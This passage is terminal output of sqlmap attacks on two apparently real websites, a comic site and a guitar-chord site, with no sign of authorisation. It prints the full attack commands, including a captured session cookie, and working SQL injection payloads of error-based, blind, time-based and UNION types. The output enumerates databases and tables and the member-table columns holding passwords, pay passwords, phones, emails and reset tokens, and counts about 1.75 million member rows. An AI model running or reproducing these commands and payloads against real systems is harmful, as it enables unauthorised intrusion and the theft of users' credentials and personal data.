| qiswl_pro                         |
| qiswl_record                      |
| qiswl_scratch_list                |
| qiswl_scratch_rec                 |
| qiswl_sign                        |
| qiswl_sticker                     |
| qiswl_sticker_set                 |
| qiswl_store_class                 |
| qiswl_store_class_sub             |
| qiswl_store_item                  |
| qiswl_subscribe                   |
| qiswl_system_error_log            |
| qiswl_system_login_log            |
| qiswl_system_operation_log        |
| qiswl_system_skin                 |
| qiswl_task                        |
| qiswl_task_event_record           |
| qiswl_task_record                 |
| qiswl_ticai                       |
| qiswl_tixian                      |
| qiswl_tuibo                       |
| qiswl_tuibo_message               |
| qiswl_tuibo_stat                  |
| qiswl_update_log                  |
+-----------------------------------+

[02:51:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 111 times
[02:51:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:51:34 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic -T qiswl_member --columns
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:52:03 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:52:03] [INFO] testing connection to the target URL
[02:52:03] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:52:03] [INFO] testing MySQL
[02:52:03] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:52:04] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:52:04] [INFO] fetching columns for table 'qiswl_member' in database 'bl_comic'
[02:52:04] [INFO] retrieved: 'id'
[02:52:05] [INFO] retrieved: 'int(12)'
[02:52:05] [INFO] retrieved: 'username'
[02:52:05] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'nickname'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'phone'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:06] [INFO] retrieved: 'password'
[02:52:06] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'encrypted_password'
[02:52:07] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'paypass'
[02:52:07] [INFO] retrieved: 'varchar(255)'
[02:52:07] [INFO] retrieved: 'register_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:08] [INFO] retrieved: 'last_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:08] [INFO] retrieved: 'no_add_time'
[02:52:08] [INFO] retrieved: 'datetime'
[02:52:09] [INFO] retrieved: 'last_device_type'
[02:52:09] [INFO] retrieved: 'enum('','PC','M')'
[02:52:09] [INFO] retrieved: 'isvip_status'
[02:52:09] [INFO] retrieved: 'tinyint(4)'
[02:52:09] [INFO] retrieved: 'viptime'
[02:52:09] [INFO] retrieved: 'varchar(50)'
[02:52:10] [INFO] retrieved: 'headimage'
[02:52:10] [INFO] retrieved: 'varchar(255)'
[02:52:10] [INFO] retrieved: 'status'
[02:52:10] [INFO] retrieved: 'tinyint(4)'
[02:52:10] [INFO] retrieved: 'money'
[02:52:11] [INFO] retrieved: 'decimal(11,2)'
[02:52:11] [INFO] retrieved: 'score'
[02:52:11] [INFO] retrieved: 'int(11)'
[02:52:11] [INFO] retrieved: 'lv'
[02:52:11] [INFO] retrieved: 'tinyint(2)'
[02:52:11] [INFO] retrieved: 'pid'
[02:52:12] [INFO] retrieved: 'int(11)'
[02:52:12] [INFO] retrieved: 'path_id'
[02:52:12] [INFO] retrieved: 'varchar(255)'
[02:52:12] [INFO] retrieved: 'register_ip'
[02:52:12] [INFO] retrieved: 'varchar(255)'
[02:52:13] [INFO] retrieved: 'login_ip'
[02:52:13] [INFO] retrieved: 'varchar(255)'
[02:52:13] [INFO] retrieved: 'login_nums'
[02:52:13] [INFO] retrieved: 'int(11)'
[02:52:13] [INFO] retrieved: 'login_country'
[02:52:14] [INFO] retrieved: 'varchar(10)'
[02:52:14] [INFO] retrieved: 'useragent'
[02:52:14] [INFO] retrieved: 'varchar(255)'
[02:52:14] [INFO] retrieved: 'lang'
[02:52:14] [INFO] retrieved: 'enum('TW','CN')'
[02:52:15] [INFO] retrieved: 'type'
[02:52:15] [INFO] retrieved: 'tinyint(4)'
[02:52:15] [INFO] retrieved: 'lxqd'
[02:52:15] [INFO] retrieved: 'int(11)'
[02:52:15] [INFO] retrieved: 'is_agent'
[02:52:16] [INFO] retrieved: 'tinyint(1)'
[02:52:16] [INFO] retrieved: 'has_kou'
[02:52:16] [INFO] retrieved: 'int(11)'
[02:52:16] [INFO] retrieved: 'tj_kou'
[02:52:16] [INFO] retrieved: 'int(11)'
[02:52:16] [INFO] retrieved: 'myui'
[02:52:17] [INFO] retrieved: 'varchar(255)'
[02:52:17] [INFO] retrieved: 'sign_cnt'
[02:52:17] [INFO] retrieved: 'tinyint(4)'
[02:52:17] [INFO] retrieved: 'last_sign_time'
[02:52:17] [INFO] retrieved: 'int(11)'
[02:52:18] [INFO] retrieved: 'autoCheckDays'
[02:52:18] [INFO] retrieved: 'smallint(6)'
[02:52:18] [INFO] retrieved: 'sumCheckDays'
[02:52:18] [INFO] retrieved: 'smallint(6)'
[02:52:18] [INFO] retrieved: 'email'
[02:52:18] [INFO] retrieved: 'varchar(255)'
[02:52:19] [INFO] retrieved: 'email_verified'
[02:52:19] [INFO] retrieved: 'tinyint(1)'
[02:52:19] [INFO] retrieved: 'reset_token'
[02:52:19] [INFO] retrieved: 'varchar(255)'
[02:52:19] [INFO] retrieved: 'store_notice'
[02:52:19] [INFO] retrieved: 'varchar(20)'
[02:52:20] [INFO] retrieved: 'game_notice'
[02:52:20] [INFO] retrieved: 'varchar(10)'
[02:52:20] [INFO] retrieved: 'eventTest'
[02:52:20] [INFO] retrieved: 'tinyint(4)'
[02:52:20] [INFO] retrieved: 'vfystat'
[02:52:21] [INFO] retrieved: 'enum('0','1')'
[02:52:21] [INFO] retrieved: 'readCount'
[02:52:21] [INFO] retrieved: 'int(11)'
[02:52:21] [INFO] retrieved: 'readCountLastM'
[02:52:21] [INFO] retrieved: 'int(11)'
[02:52:21] [INFO] retrieved: 'limitVipEndTime'
[02:52:22] [INFO] retrieved: 'datetime'
[02:52:22] [INFO] retrieved: 'favTagKey'
[02:52:22] [INFO] retrieved: 'enum('0','1')'
[02:52:22] [INFO] retrieved: 'q_send_cnt'
[02:52:22] [INFO] retrieved: 'smallint(6)'
[02:52:23] [INFO] retrieved: 'q_corr_cnt'
[02:52:23] [INFO] retrieved: 'smallint(6)'
[02:52:23] [INFO] retrieved: 'avatar_using'
[02:52:23] [INFO] retrieved: 'mediumint(9)'
[02:52:23] [INFO] retrieved: 'mlevel'
[02:52:23] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mexp'
[02:52:24] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mgold'
[02:52:24] [INFO] retrieved: 'int(11)'
[02:52:24] [INFO] retrieved: 'mbookcount'
[02:52:24] [INFO] retrieved: 'smallint(6)'
[02:52:25] [INFO] retrieved: 'lostEmail'
[02:52:25] [INFO] retrieved: 'smallint(4)'
[02:52:25] [INFO] retrieved: 'showHintTag'
[02:52:25] [INFO] retrieved: 'varchar(10)'
[02:52:25] [INFO] retrieved: 'has_sent_lost_mail'
[02:52:26] [INFO] retrieved: 'tinyint(4)'
Database: bl_comic
Table: qiswl_member
[57 columns]
+--------------------+-------------------+
| Column             | Type              |
+--------------------+-------------------+
| status             | tinyint(4)        |
| type               | tinyint(4)        |
| autoCheckDays      | smallint(6)       |
| avatar_using       | mediumint(9)      |
| email              | varchar(255)      |
| email_verified     | tinyint(1)        |
| encrypted_password | varchar(255)      |
| eventTest          | tinyint(4)        |
| favTagKey          | enum('0','1')     |
| game_notice        | varchar(10)       |
| has_kou            | int(11)           |
| has_sent_lost_mail | tinyint(4)        |
| headimage          | varchar(255)      |
| id                 | int(12)           |
| is_agent           | tinyint(1)        |
| isvip_status       | tinyint(4)        |
| lang               | enum('TW','CN')   |
| last_device_type   | enum('','PC','M') |
| last_sign_time     | int(11)           |
| last_time          | datetime          |
| limitVipEndTime    | datetime          |
| login_country      | varchar(10)       |
| login_ip           | varchar(255)      |
| login_nums         | int(11)           |
| lostEmail          | smallint(4)       |
| lv                 | tinyint(2)        |
| lxqd               | int(11)           |
| mbookcount         | smallint(6)       |
| mexp               | int(11)           |
| mgold              | int(11)           |
| mlevel             | int(11)           |
| money              | decimal(11,2)     |
| myui               | varchar(255)      |
| nickname           | varchar(255)      |
| no_add_time        | datetime          |
| password           | varchar(255)      |
| path_id            | varchar(255)      |
| paypass            | varchar(255)      |
| phone              | varchar(255)      |
| pid                | int(11)           |
| q_corr_cnt         | smallint(6)       |
| q_send_cnt         | smallint(6)       |
| readCount          | int(11)           |
| readCountLastM     | int(11)           |
| register_ip        | varchar(255)      |
| register_time      | datetime          |
| reset_token        | varchar(255)      |
| score              | int(11)           |
| showHintTag        | varchar(10)       |
| sign_cnt           | tinyint(4)        |
| store_notice       | varchar(20)       |
| sumCheckDays       | smallint(6)       |
| tj_kou             | int(11)           |
| useragent          | varchar(255)      |
| username           | varchar(255)      |
| vfystat            | enum('0','1')     |
| viptime            | varchar(50)       |
+--------------------+-------------------+

[02:52:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 118 times
[02:52:26] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:52:26 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://boylove.cc/home/index/dailyupdate1/weekday/*/page/2"   --cookie="PHPSESSID=17781a2d5a230d756cb625fad04a700c; _clck=aa2yzv%5E2%5Efza%5E0%5E2082; _clsk=vnu668%5E1757754974429%5E31%5E0%5Ee.clarity.ms%2Fcollect; autoSignRs=1; bulletin_new_31=1; dark=N; history=%5B%7B%22manhua_id%22%3A31373%2C%22manhua_title%22%3A%22%5Cu7070%5Cu70ec%5Cu503e%5Cu8986%5Cu4e4b%5Cu6d77%22%2C%22manhua_image%22%3A%22%5C%2Fbookimages%5C%2Fimg%5C%2F20250817%5C%2F8ead0a501585076c15615518f0accd6b.webp%22%2C%22manhua_type%22%3A1%2C%22manhua_vipcanread%22%3A0%7D%5D; lang=CN; returnOct=true; rfv=https%3A%2F%2Fboylove.cc%2Fhome%2Fbook%2Findex%2Fid%2F; shunt=3; todayBrowseDay=true; todayBrowseMonth=true; type=1"   --technique=E   --dbms=mysql   --level=5   --risk=3   --batch -D bl_comic -T qiswl_member --count
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:52:57 /2025-09-14/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:52:57] [INFO] testing connection to the target URL
[02:52:57] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: error-based
    Title: MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)
    Payload: https://boylove.cc/home/index/dailyupdate1/weekday/GTID_SUBSET(CONCAT(0x7171766a71,(SELECT (ELT(2720=2720,1))),0x71717a7071),2720)/page/2
---
[02:52:57] [INFO] testing MySQL
[02:52:57] [INFO] confirming MySQL
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] Y
[02:52:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[02:52:58] [INFO] retrieved: '1752753'
Database: bl_comic
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| qiswl_member | 1752753 |
+--------------+---------+

[02:52:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[02:52:58] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/boylove.cc'

[*] ending @ 02:52:58 /2025-09-14/
 
Code:
Database: lc_ubase
+----------+---------+
| Table    | Entries |
+----------+---------+
| usuarios | 243328  |
+----------+---------+


(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*" \
  --dbms=mysql \
  --level=5 \
  --risk=3 \
  --batch \
  --flush-session \
  --dbs --random-agent
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.9.9#pip}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:34 /2025-09-14/

[02:55:34] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:55:34] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:55:34] [INFO] testing connection to the target URL
[02:55:35] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:55:35] [INFO] testing if the target URL content is stable
[02:55:36] [INFO] target URL content is stable
[02:55:36] [INFO] testing if URI parameter '#1*' is dynamic
[02:55:36] [WARNING] URI parameter '#1*' does not appear to be dynamic
[02:55:36] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[02:55:37] [INFO] testing for SQL injection on URI parameter '#1*'
[02:55:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:56:16] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:56:49] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[02:56:52] [INFO] URI parameter '#1*' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[02:56:52] [INFO] testing 'Generic inline queries'
[02:56:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:56:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:56:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:56:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:56:54] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[02:56:54] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[02:56:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:56:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:56:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:56:56] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:56:56] [INFO] URI parameter '#1*' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[02:56:56] [INFO] testing 'MySQL inline queries'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[02:56:57] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[02:56:58] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[02:56:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[02:56:58] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[02:56:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:56:59] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:57:09] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)' injectable
[02:57:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:57:09] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:57:10] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:57:12] [INFO] target URL appears to have 15 columns in query
[02:57:14] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[02:57:14] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[02:57:14] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 238 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:57:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0
[02:57:17] [INFO] fetching database names
[02:57:18] [INFO] retrieved: 'information_schema'
[02:57:18] [INFO] retrieved: 'lc_comunidad'
[02:57:19] [INFO] retrieved: 'lc_dbase'
[02:57:19] [INFO] retrieved: 'lc_topsites'
[02:57:20] [INFO] retrieved: 'lc_ubase'
available databases [5]:
[*] information_schema
[*] lc_comunidad
[*] lc_dbase
[*] lc_topsites
[*] lc_ubase

[02:57:20] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:57:20 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase --tables
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9#pip}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:57:52 /2025-09-14/

[02:57:52] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; cs-CZ) AppleWebKit/525.28.3 (KHTML, like Gecko) Version/3.2.3 Safari/525.29' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:57:52] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:57:52] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:57:53] [INFO] testing MySQL
[02:57:53] [INFO] confirming MySQL
[02:57:55] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.6.40, Apache
back-end DBMS: MySQL >= 5.0.0
[02:57:55] [INFO] fetching tables for database: 'lc_ubase'
[02:57:56] [INFO] retrieved: 'amigos'
[02:57:56] [INFO] retrieved: 'appfavs'
[02:57:57] [INFO] retrieved: 'bandas'
[02:57:57] [INFO] retrieved: 'canciones'
[02:57:58] [INFO] retrieved: 'chordbase'
[02:57:58] [INFO] retrieved: 'colabs'
[02:57:58] [INFO] retrieved: 'coms'
[02:57:59] [INFO] retrieved: 'enlaces'
[02:57:59] [INFO] retrieved: 'favlists'
[02:57:59] [INFO] retrieved: 'favs'
[02:58:00] [INFO] retrieved: 'geografia'
[02:58:00] [INFO] retrieved: 'nuevas'
[02:58:01] [INFO] retrieved: 'perfiles'
[02:58:01] [INFO] retrieved: 'peticiones'
[02:58:01] [INFO] retrieved: 'socios'
[02:58:02] [INFO] retrieved: 'trans'
[02:58:02] [INFO] retrieved: 'ultimedia'
[02:58:02] [INFO] retrieved: 'usuarios'
[02:58:03] [INFO] retrieved: 'vidcolabs'
[02:58:03] [INFO] retrieved: 'videos'
[02:58:03] [INFO] retrieved: 'vidvotos'
[02:58:04] [INFO] retrieved: 'votos'
Database: lc_ubase
[22 tables]
+------------+
| amigos     |
| appfavs    |
| bandas     |
| canciones  |
| chordbase  |
| colabs     |
| coms       |
| enlaces    |
| favlists   |
| favs       |
| geografia  |
| nuevas     |
| perfiles   |
| peticiones |
| socios     |
| trans      |
| ultimedia  |
| usuarios   |
| vidcolabs  |
| videos     |
| vidvotos   |
| votos      |
+------------+

[02:58:04] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:58:04 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usarios --columns
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:58:44 /2025-09-14/

[02:58:44] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:58:44] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:58:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR NOT 9497=9497-- VyhH

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 1528 FROM(SELECT COUNT(*),CONCAT(0x7162627071,(SELECT (ELT(1528=1528,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- MCuM

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' OR (SELECT 3325 FROM (SELECT(SLEEP(5)))XxQf)-- rbJf

    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: https://lacuerda.net/Evolucion/petiz/jump.php?rcode=' UNION ALL SELECT NULL,CONCAT(0x7162627071,0x4b67526753465946527855486c624a50736176684a5449504c764b79476663475671737246795253,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[02:58:45] [INFO] testing MySQL
[02:58:45] [INFO] confirming MySQL
[02:58:46] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.0
[02:58:46] [INFO] fetching columns for table 'usarios' in database 'lc_ubase'
[02:58:47] [WARNING] unable to retrieve column names for table 'usarios' in database 'lc_ubase'
do you want to use common column existence check? [y/N/q] N
[02:58:47] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/lacuerda.net'

[*] ending @ 02:58:47 /2025-09-14/

(myenv) root@E02S29:~# sqlmap -u "https://lacuerda.net/Evolucion/petiz/jump.php?rcode=*"   --dbms=mysql   --level=5   --risk=3   --batch     --random-agent -D lc_ubase -T usuarios --columns
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9#pip}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:59:06 /2025-09-14/

[02:59:06] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1' from file '/root/myenv/lib/python3.12/site-packages/sqlmap/data/txt/user-agents.txt'
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[02:59:06] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:59:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
